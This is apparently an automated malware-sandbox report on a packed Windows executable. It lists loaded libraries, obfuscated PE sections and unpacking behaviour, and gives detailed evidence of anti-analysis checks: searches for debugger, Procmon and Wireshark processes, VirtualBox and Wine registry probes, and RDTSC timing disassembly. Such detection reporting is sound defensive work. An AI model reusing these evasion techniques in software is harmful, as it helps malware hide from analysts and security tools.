Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: file.exeReversingLabs: Detection: 31%
Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: file.exeStatic file information: File size 4490752 > 1048576
Source: file.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283a00
Source: file.exeStatic PE information: Raw size of dkqxmldn is bigger than: 0x100000 < 0x1c1000

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.530000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dkqxmldn:EW;ajwrokqy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dkqxmldn:EW;ajwrokqy:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: file.exeStatic PE information: real checksum: 0x44a3f0 should be: 0x44d94c
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: dkqxmldn
Source: file.exeStatic PE information: section name: ajwrokqy
Source: file.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016DD258 push edx; ret 0_3_016DD259
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016DB222 push ebp; iretd 0_3_016DB261
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016CDB14 push eax; retf 0_3_016CDB1D
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016DF0AD push esi; ret 0_3_016DF0F2
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0172E691 push edx; ret 0_3_0172E692
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016DD258 push edx; ret 0_3_016DD259
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016DB222 push ebp; iretd 0_3_016DB261
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016CDB14 push eax; retf 0_3_016CDB1D
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016DF0AD push esi; ret 0_3_016DF0F2
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B41D0 push eax; mov dword ptr [esp], edx0_2_008B41D5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B2340 push eax; mov dword ptr [esp], 00000000h0_2_005B2343
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC7F0 push eax; mov dword ptr [esp], 00000000h0_2_005EC743
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00570AC0 push eax; mov dword ptr [esp], 00000000h0_2_00570AC4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00591430 push eax; mov dword ptr [esp], 00000000h0_2_00591433
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B39A0 push eax; mov dword ptr [esp], 00000000h0_2_005B39A3
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058DAD0 push eax; mov dword ptr [esp], edx0_2_0058DAD1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B9F40 push dword ptr [eax+04h]; ret 0_2_008B9F6F
Source: file.exeStatic PE information: section name: dkqxmldn entropy: 7.95546200906979

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDFA5A second address: BDFA70 instructions: 0x00000000 rdtsc 0x00000002 js 00007F70F070E5C8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e jbe 00007F70F070E5CCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D41B second address: D3D45C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB16h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F70F0BCDB1Eh 0x00000014 jmp 00007F70F0BCDB18h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D45C second address: D3D462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D462 second address: D3D468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D468 second address: D3D474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jne 00007F70F070E5C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D474 second address: D3D47F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5BFCB second address: D5BFD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5BFD1 second address: D5BFD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5BFD7 second address: D5BFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D3h 0x00000009 popad 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5BFF5 second address: D5BFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5BFFB second address: D5BFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DB21 second address: D5DB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DB26 second address: D5DB79 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F70F070E5C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d je 00007F70F070E5CCh 0x00000013 or dword ptr [ebp+122D3919h], esi 0x00000019 push 00000000h 0x0000001b call 00007F70F070E5CBh 0x00000020 jmp 00007F70F070E5D7h 0x00000025 pop edx 0x00000026 call 00007F70F070E5C9h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jno 00007F70F070E5C6h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DB79 second address: D5DB7F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DB7F second address: D5DBC2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F70F070E5D8h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jo 00007F70F070E5C8h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F70F070E5CBh 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f pushad 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push edi 0x00000024 pop edi 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DBC2 second address: D5DBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DBC6 second address: D5DBEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DBEC second address: D5DBF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DBF0 second address: D5DC0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DD6D second address: D5DDCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jns 00007F70F0BCDB06h 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e jp 00007F70F0BCDB17h 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F70F0BCDB08h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f add dword ptr [ebp+122D1BD1h], ecx 0x00000035 push 00000000h 0x00000037 mov esi, dword ptr [ebp+122D2DDDh] 0x0000003d push 2269675Ah 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 pushad 0x00000046 popad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DDCC second address: D5DDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DDD1 second address: D5DE16 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F70F0BCDB08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 226967DAh 0x00000011 or cx, D939h 0x00000016 push 00000003h 0x00000018 mov ecx, dword ptr [ebp+122D2E15h] 0x0000001e push 00000000h 0x00000020 jo 00007F70F0BCDB0Ch 0x00000026 mov dword ptr [ebp+122D1C38h], esi 0x0000002c push 00000003h 0x0000002e add dword ptr [ebp+122D2366h], ebx 0x00000034 call 00007F70F0BCDB09h 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DE16 second address: D5DE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DE1A second address: D5DE33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DE33 second address: D5DE3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F70F070E5C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DE3D second address: D5DE41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DE41 second address: D5DE53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F70F070E5C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DE53 second address: D5DE57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DF36 second address: D5DF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 jc 00007F70F070E5D0h 0x0000000d jmp 00007F70F070E5CAh 0x00000012 nop 0x00000013 mov edx, dword ptr [ebp+122D2ACDh] 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D2156h], esi 0x00000021 push EDE259D0h 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DF66 second address: D5DFE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d popad 0x0000000e add dword ptr [esp], 121DA6B0h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F70F0BCDB08h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f jmp 00007F70F0BCDB0Eh 0x00000034 mov cx, ax 0x00000037 push 00000003h 0x00000039 mov di, 9810h 0x0000003d push 00000000h 0x0000003f adc di, 6A9Ah 0x00000044 push 00000003h 0x00000046 jmp 00007F70F0BCDB0Eh 0x0000004b call 00007F70F0BCDB09h 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jng 00007F70F0BCDB06h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DFE2 second address: D5E029 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F70F070E5C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F70F070E5D9h 0x00000012 push ebx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop ebx 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F70F070E5D6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E029 second address: D5E056 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007F70F0BCDB06h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F70F0BCDB16h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8056D second address: D80573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80573 second address: D80586 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F70F0BCDB06h 0x00000008 je 00007F70F0BCDB06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EB6B second address: D7EB7D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F70F070E5CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EB7D second address: D7EB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F4E6 second address: D7F4F0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F70F070E5CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72A36 second address: D72A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F0BCDB11h 0x00000009 pop ebx 0x0000000a jng 00007F70F0BCDB0Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 jnc 00007F70F0BCDB06h 0x0000001b pop edx 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D564FF second address: D56509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F70F070E5C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56509 second address: D5650D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5650D second address: D56513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F7B2 second address: D7F7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jg 00007F70F0BCDB06h 0x0000000f jg 00007F70F0BCDB06h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F7C8 second address: D7F7CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FD41 second address: D7FD45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FFCC second address: D7FFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80134 second address: D80138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80138 second address: D8015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F70F070E5D8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8015A second address: D8015E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80420 second address: D80431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F70F070E5CBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80431 second address: D80435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87EEE second address: D87EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86F7A second address: D86F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jnl 00007F70F0BCDB06h 0x00000011 jnl 00007F70F0BCDB06h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F70F0BCDB0Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CF7E second address: D8CFA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CFh 0x00000007 pushad 0x00000008 jmp 00007F70F070E5D2h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CFA6 second address: D8CFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CFB2 second address: D8CFB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CFB6 second address: D8CFBF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C3C3 second address: D8C3DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F70F070E5D4h 0x0000000b rdtsc
